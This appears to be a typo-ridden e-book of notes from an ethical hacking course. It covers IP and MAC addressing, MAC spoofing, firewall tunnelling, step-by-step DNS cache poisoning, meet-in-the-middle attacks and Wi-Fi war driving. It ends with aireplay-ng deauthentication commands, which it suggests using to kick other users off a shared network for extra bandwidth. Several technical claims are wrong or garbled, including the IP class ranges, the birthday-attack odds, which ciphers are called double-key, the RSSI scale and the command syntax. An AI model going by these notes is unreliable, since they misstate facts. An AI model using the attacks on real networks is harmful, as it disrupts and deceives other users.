You are on page 1of 23

Ankit Fadia Ethical Hacking Notes

This article is strictly from Ankit Fadia Course on 5.0
Videos are Not Published along this PDF file. Only Valuable Notes with Images are descirbed in this Book. This Book contains Important Questions and FAQ from afceh. For any Query related to this E-Book , You are Kindly EMAIL me at

Internet Protocol (IP Address)
An attacker's First step is to Find out the IP addres of the Target Sytem(Victim Computer IP address ). Every System connected to a network has a unique IP address associated with itself. An IP ddress acts as Unique ID for each person as Phone Number. If I want to connect with your computer,then i must know your computer's IP address. IP Address is a 32 Bit address shortly divided into 4 fields of 8 Bits ,each containing numberic between .
1 to 255

For Example : An IP address reveal a Lot of Information about a Network that it Belongs. Class A: Class B: Class C: Class D: Class E: to to to to to

Class A : First 8 Bit reveals Network ID nd Last 24 Bits Reveals Host ID. Class B : First 16 Bits : Network ID and Last 16 Bits reveals host ID. Class C : First 24 Bits Reveals Network ID and Last 8 Bits reveals Host ID. Class D : 32 Bits Muticast Group ID Class E : Not in Use.

Network Address Translation(NAT)
Network Address Translation is a Solution for IP address Shortage. There are 100 Billion Hosts and 350 Million users get Online at a time over internet , so number of IP address is not enough to provide all. The obvious solution is to redesign the address format to allow for more possible addresses. This is being developed (called IPv6), but will take several years to implement because , it requires modification of the entire infrastructure of the Internet. This is where NAT comes to the rescue. Network Address Translation allows a single device, such as a router, to act as an agent between the Internet (or "public network") and a local (or "private") network. This means that only a single, unique IP address is required to represent an entire group of computers.

Internal V/s External IP
Internal IP address are a group of up to 255 IPs that are used and recognized internally on the local area network (LAN). They are not intended to be recognized on the Internet . The External IP address is prvide Internet Service Provider(ISP).

How to Find out your Internal IP address ?
Go To Start > Run >Type cmd . After Open command Prompt Type ipconfig

How to Find your External IP address ?
Go to Or

Media Access Control(MAC) address
Every NIC (Network Interface Card ) card have unique Identity address . MAC address is a 12 digit HexaDecimal number. For Example : 00-1e-a6-02-03-7e How to Find your MAC address ? Go to Command Prompt and Type arp -a Which displays you both IP address and MAC address.

MAC address Spoofing
Actually MAC address Spoofing Means Changing MAC address into desired one. To change your current MAC address you must have tool Like Etherchange.

How to do Mac Spoofing ?
You Must Download and Install EtherChnage in our System. Now Open your Etherchange through Command Prompt. Now Type Etherchange and Select your Network adapter from the Displayed Menu. Then Select 1 (Specify a New Ethernet Address) and Type new ethernet address. A successful Mesage will be display on he Screen. Now go to Network Conections and Disable and Re-enable the Network adapter.

How to Find MAC address of Remote System ?
Run any Data sniffer (Winshark,Ethreal,Windumb)on your Computer
For Example Winshark. Download , Insatll and Run it on your Computer. You can see all the Data Packets send or recieved ,Source IP address and destination IP address in your network. Now Select any IP address (Victim's IP address) and Click on "Ethernet II, " . It provide you MAC address of remote system.

FPort is a Tool used to find out all Open Port and it is a fabulous way to identify wether trojan working or Not. You can download this tool from Install Fport in your System and run through Command Prompt. Now Type fport

It provide you What Process is Running,Port Number,Protocol,Running programs Path . Hence,we can check which Port are Open are running nd what daemon are using etc.

Ping Sweeping
Ping Tool is using to determine wether the target system is connected to Internet or Not. It make use of Internet Control Message Protocol(ICMP). Here Attcker Sends an ICMP Echo Request to Host Host Replays an ICMP Echo Request to Attacker This conclude Target is connected to Internet. If Hosts Haven't response to Attacker, then we can conlude the Target system is not connected to Internet.

How to Ping ?
Open Command Prompt and Type Ping [Website] and Hit [Enter] .

If the System alives it will Display the Replays in the Above Image.

Uses of Ping Sweeping
Dos Attacks Os Detection Purposes

Tools Available
Cping SuperScan Nmap ws_ping ProBack

Ping Seep:Detection
Manual or automated traffic monitoring should be able to easily detect a ping sweep

Firewall Tunneling using SSH & Putty

Lets assume that you are connected to the inernet and are behind a firewall that doesn't allow you to make outgoing connections to Port 25 (SMTP) and Port 80 (HTTP) of remote computers. However , you really need yo establish such connections.
What do you need to do ?

It may be possible that the firewall has not blocked outgoing connection to Port 22(SSH). This means that you can use Putty to create a SSH tunnel connection through the firewall (port 22) to a SSH server that you have access to and then use it to connect to the blocked remote systems.

-Setup your own or register for free on a SSH server that has unblocked access to internet. -Use Putty to create an encrypted SSH connection to the remote SSH server, (Outgoing port 22 , encrypted communication is allowed by local firewall ). Putty opens a local port that you can now connect to in order to access the remote SSH server. -This SSH server then connects to the blocked systems that you want to access.!

HTTP Tunneling
Many times we find ourselves in networks that have blocked access to certain websites or doesn't allow to use certain HTTP applications (Like chat,gaming etc.) to communicate . HTTP Tunneling allows users who are beind such restrictions (Like firewall or Proxy servers) to hide thier real activity /data inside unsuspicious looking HTTP traffic , hence fooling the restrictions that are in place .

Port Forwarding
Typically in a home or office environment,most users access the inernet through a router. The router has public IP Address and can be seen by everybody on the internet. All users behind the router are invisible to the internet since all of them have an interal IP address which cannot be accessed to allow remote computers on the internet to be able to connect to internal systems behind a router . This is where Port Forwarding comes into the picture . Port Forwading allows you to remotely access your computer behind a router from anywhere on he internet . Normally from the internet you can only access the router, but port forwading allows you to acess all computers router . For Example,you may wish to access files on your computer while you are traveling abroad or are at work. Port Forwading is also used to setup a web server at home,setup online game, to speed up p2p file sharing tools,share an IP address and to do other useful things.

DNS Attacks
A DNS (Domain Name server) lookup is a query sent by a user (browser ot IM or email client) to a DNS server to convert a particular domain name into its respective IP address. A reverse DNS lookup is a Query sent by a user to a DNS server to convert an IP address into it respective domain.

There are various websites that allow you to play arounf DNS:

DNS Poisoning Attacks
Most users usually use DNS server close by (ISP or college network) to perform DNS lookups. Hence,a single DNS server manages DNS lookups for any where between a few dozen to thousands of uses. To improve speed or performance ,DNS servers uses cache DNS lookup results. A DNS cache poisoning attack allows an attacker to change the IP address to which a particular domain name points,hence returning a false IP Address whenever that domain is looked up by the Victim.

Video Tutorial

DNS Poisoning Sniffing ID Attack
Step 1 : Attacker sends a DNS lookup Request for a particular domain from a spoofed IP. Step 2: The Victim DNS server will forward the DNS lookup request to the authoritative name server in order to resolve the query, This request will have a unique Identifier (ID) or transaction ID. Step 3 : Attacker using a data sniffer in the same network as victim DNS server to record the ID of the request sent to the authoritative name server . Step 4: Attacker now sends a reply with the sniffed ID with false information back to the victim DNS server. Step 5: The victim DNS server has now been poisoned with false information for the specific domain name. If an unsepecting user queries that DNS server for the specific domain name, then the user would be sent to the false (maliciuos) website. Hence DNS cache has been poisoned.

DNS Cache Poisoning Birthday Attack
Step 1 : Attacker sends n DNS Lookup requests for the same domain name to the victim DNS server, each with different spoofed source IP address. Step 2 : The victim DNS server will forward all the n DNS lookup requests to authoritative DNS server in order to resolve the Query. Each of these requests will have a different ID and the victim server is waiting for n different replies to resolve the same domain. The ID field is only 16 bits in length , so its value can range from 0 to 65535 Step 3 : Attacker sends several spoofed replies from the authorittive name servers with false
lookup results to the victim DNS server with different IDs trying to guess

one of the expected reply IDs. The Probability of guessing the correct ID is (Number of spoofed requests /65535).However , If you apply birthday paradox to this attack,then the probability is significantly improved. Research has shown that at around 700 data packets , the probability of guessing the correct ID is 100%. If the ID matches,then successful DNS cache poisoning Birthday attack gets executed. Step 4 : Attacker has to guess the correct ID faster than the Victim DNS server gets a reply from othe DNS servers. It is Possible to slow down the reply frm other DNS server by flooding thm with bogus packets. Step 5: The victim DNS server stores the false DNS query reply in its cache. Now whenever any real user requests that particular domain, then false replies will be sent to them!

Note : Its important to note that for a DNS cache poisoning Birthday attack to work properly, along with the ID field,the source & Destination IP address and ports should also match! Getting the IP address of the victim & other DNS servers is easy , destination port is usually UDP 53 and source port can either be guessed or find out using a data sniffer.

DNS Cache Poisoning Birthday Attack
According to the Birthday Paradox , if there are 23 random people in a room, then in a room, then there is more than 50% probability that any two of them will have the same birthday. If you ask 1 person ,then chances of that person having the same birthday as you is very low (1/365 = 0.27%). Even if you ask 20 people , the chances are very low. However ,when you put 20 people in the same room,then each person is trying 19 times , hence the probability goes up drastically. If you put 57 people together in the same room,then the probablility of any two ot them having the same birthday goes up as high as 99%. And when you put 366 people together in the sae room,then the probability reaches 100% (Ignoring Leap Year). This Birthday paradox is commonly used to break different encyption algorithms. Usually to convert some unencrypted plain text into its encrypted value, some function is executed on it. Encrypted Value = Plain Text * Some Function. Based on the birthday paradox, by repeatedly entering different inputs into some function, then the same output is executed after 1.2*(Total Number of possible Encrypted Values) , which are not too many attempts.

DNS Attacks :Counter Measures
Forward Confirmed Reverse DNS or FCrDNS is when the forward lookup and reverse lookup IP address matches. Whenever anybody types a domain name,then DNS lookup is performed to get its respective IP Addres and then a reverse lookup is performed on the IP address to get the domain name. If there is a match , then the FCrDNS check passess. FCrDNS online testing tool :

DNSSEC stands for domain name system security extensions is a modified version of DNS that allows encypted responces. Hence making it quite difficult for attackers to carry out any attacks.

Meet In The Middle Attack
Usually to convert some unencrypted plain text into its encrypted value, some function is executed on it. Encrypted Value = Plain Text * Some Function Encryption Value = Plain Text * Some Key We Have already seem how easy it is so break birthday attack. Inorder to improve security,an obviuos choice would be to use two independent different functions.
Encrypted Value = Second key*(Plain Text * First Key)

If we were to use brute force,then to crack the above type of encryption then 2 2n attempts would have to be made as opposed to 2 2n attempts if only 1 Key encryption was being used. So it seems that a 2 Key encryption algorithms is more secure. In the Meet in the Middle attack, such a 2 key enctyption algorithm is attacked from both sides using brute Attacker tries to encrypted the plain text using different keys to get an intermediate encrpted value(that has been passed through only any one of the Keys. Simultaneosly,attacker also tries to decypt the encypted value using different keys to get n intermediate encrypted value (That has been passed only through only any one of the Keys. For Whcih ever case the intermediate value matches,it is highly likely that the Key used to encrypt the plaintext and the Key used to decrypt the encrypted value are the two keys of the 2 Key encyption algorithm being used .Voila/..!

Such an attacker works against successive 2 Key encryption algorthm like Double DES, Twofish,AES ?

Wireless Network Hacking
Most of you would have used wireless networks either in your college ,office or airports. Wireless Networks have become so very common everywhere due to thier great convienece and growing ppularity of laptops. Typically a area that offers Wireless internet access is known as Hotspot. Some hotspots provide free internet acces,while other require you to pay for internet access and may even ask you to enter Password. Poisoned Hotspots : Many cyber criminals setup unprotected password less Wireless Networks at thier home/office. Invite unsespecting users to use thier network for the internet access and then use sniffers to snoop thier data,get thier passwords etc..Such networks are commonly known as Hotspots. Setting Up a Wireless Networks: You will need to buy a Wireless Router (Linsys/) that ideally supports at least 802.11n wireless standard + you will need a wireless adapter for your computer. Most laptops nowadays will already come with wireless adapter. Install and setup the wireless router and adapter. It is advisable to configure security settings properly to avoid misuse for your Wifi network. To configure the settings of the wireless router ,start your browser and type : (Lynksys) Usually you can enter admin as the username and admin aor password as the password. Now you can configure the settings the way you want ,choose maximum possible security . The Problem with wireless networks is that,they broadcast messages using Radio Waves, they can easily be eavesdropped or listened by an attacker. This is where encryption standards come ino the picture. WEP (Not secure at all ) WPA (quie ecure ,but not foolproof security ) WPA2 (very Secure ).

Setting Up a Wireless Networks:

SSID: (Sometimes known as ESSID) is short service set identifier. It is public name of Wireless Networkwhich is used to identify a particular network.Usually , SSIDs are case sensitive and are a sequence of alphanumeric characters(letters or numbers). SSIDs have a maximum length of 32 characters. SSIDs are almost like the domain name for a Wireless Network. Different Wireless Networks in the same geographical area ue different SSIDs for differentaition. BSSID: BSSID stands for Basic service set identifier is the 48-bit MAC address of the Access Point of a Wireless Network. Wireless Access Point (WAP) is a device that allows devices (Like Laptop,MOBILE) to connect to a Wireless Network using WI-FI & others wirless standards. Usually an AP can serve multiple users within a specific area and as the users move beyond the range, then they are automatically handed over to the next AP.So a large physical room (Like a conference center) may require a large number of APs.

MAC Address : Short for Media Access Control addess is a 48 bit unique address that identifies every node in a network.Usually MAC addresses are assigned at the time of manufacture itself,how ever, they can be changed. In Wireles Networks ,even APS have MAC addresses. PSK : Stands for pre Shared key and is commonly used in encryption systems. It is a password or secret key that is shared amongst all the users using that particular encryption system.In Wireless Networks ,it refers to the password that is shared between all users and APs without which nobody can connect to the Wireless network. PSK is vulnerable to dictionary and brute force attacks.

WEP (Wired Equilent Privacy) WEP: is a security protocol that encrypts data transmission over wireless networks using secret keys .There are typically settings of WEP. In the WEP protocol , the AP & all the clients (users) connected to a wireless network should know the same secret key or password(PSK). When a user connects to a WEP encrypted wireless network,then he needs to enter this PSK. This secret Key or password is then used by WEP to encrypt all data transmission. It is a common misconception that WEP passwords are used for authentication & to control access to the WIFI network,.Actually WEP was originally designed to encrypt wireless communication & not to authenticate users. It is important to know that if a user doesnot know the PSK key , then he can't connect to the Network.However WEP has been cracked and that too very easily.This led to creation of better and more secure wireless encryption standards. WEP doesnot provide for any way to share the Keys between the AP and Clients,which makes it difficultfor the KEY to be chaged regularly over te wireless network automatically. Hence , most system admins and users tend to use the same wireless networks for long periods of time. This static nature of the wireless Keys in WEP is its biggest weaknes. Hence this gives an attacker plenty of time to find out the encryption key of the network.


WPA Stands for WI-FI protected Access and it is the more secure & impoved version of WEP. It provides for better data ecryption using the TKIP (Temporal Key Integrity protocol) protocol that scrambles the key using a hashing algorith and checks the integrity of the key to detect any tampering. It also provied better user authentication through the extensible autheentication protool(EAP) which uses a robust public key encryption system to ensure only authorized users can connect to the network.

WPA2 Upgraded version of WPA and has increased levels of security. It uses advanced Encryption Stanford(AES) to provide stronger ecrypion. WPA2 uses unique keys for each cliet to encrypt every data packet sent over the network and avoids resuse.It is as of now the most secure implementation of encryption over wireless. RSSI Recieved Signal Strength indication and represents the signal strength of a wireless network. RSSI values can range 0 to -100 . The closer thae RSSI value is -100 ,the better is its signal strength and the closer the RSSI value is ,the wore is teh signal.

War Driving
War Drivig is the technique of earching for accessible wireless networks by a person using a laptop or PDA and sitting in a moving car or by ust walking around. Typically,in a war driving a user can find out the following information about WAN in range. SSID MAC address Type of Security being Used (WEP,WAP,WAP2) Signal Streght & Location

There are usually 2 ways in which war driving tools are able to discover wireless networks. Beacons Beacons :All APs periodically transmit beacons to announce its presence every 1/10 th of a second and the contain important network information(especially SSID). Many war driving tools constantly passively listen for such beacons to discover WAN. This technique doesnot require the war driver to send any data to any wireless network and hence is a passive scanning technique.Some APs don't include thier SSID s in their beacons to war drivers! But such APs are still detected by war driver albeit without thier SSID Probe Requests & Responses They are packets that are sent by a computer asking for a specific SSID APs to repond or all APs to respond. If a probe request packet has a particular SSID mentioned then it is known as a 'directed probe request' and it requires that APs that support the same SSID should reply. If a NULL or empty probe request is sent then all APs (of all SSIDs) that can hear the request are required to reply with a probe reply. All types of probe replies must contain the SSID of the network they came from. This is an active scanning technique of war driving.

War Driving Tools There are variuos tools that allow War Driving : inSSIDER (Windows Based) Vistnumbler (Vista Tool) NetStumbler (Windows based) Kismet (Linux) AirMagnet (Expensive Tool)

Re-Association :
Re-Association packets Must contain the SSID of the Network. Hence,they help criminals to dicover the SSID of even those network, hat donot broadcast the SSID in their beacons packets. This is another example of passive war driving.

De-Authentication Attack :
In case particular AP is not broadcasting its SSID in its beacon packets, then normally you have to wait for one of the clients to send re-association request to AP or maybe a new client to send an association request to the AP. Instead it is possible to send a de-authentication packet to the broadcast address of the target WLAN with a spoofed source adress as the AP. This will lead to all the clients getting disconnected & they would then try to reconnect by sending a re-association request,which allows you to grab te SSID This can easily be executed with the help of a very interesting tool called Aireplay-ng which is a part of the popular Air crack toolkit. We will learn more anout this toolkit in detail later. You can use this tool to kick active users off the network and then force them to send a re-association request and find out their SSID. If you are connected to a wireless network and are getting low speeds since there are too many active users on it.,then it possible to executer a de-authentication attack and kick active users off the network and get more bandwidth for youreself. aireplay-ng -0 50 - AP_MAC -c you_MAC_interface_name This will temporarily kick all users (50) from the wireless network.! airepla-ng -0 1 -a AP_MAC -c your_MAC ath where : -0 means de-authentication packet -1 is the number of de-authentication packets ,0 means nonstop - AP MAC ,specifies client MC addres that needs to deauthenticate . If not mentioned ,then all clients get de-authenticated. -ath specifies interface name .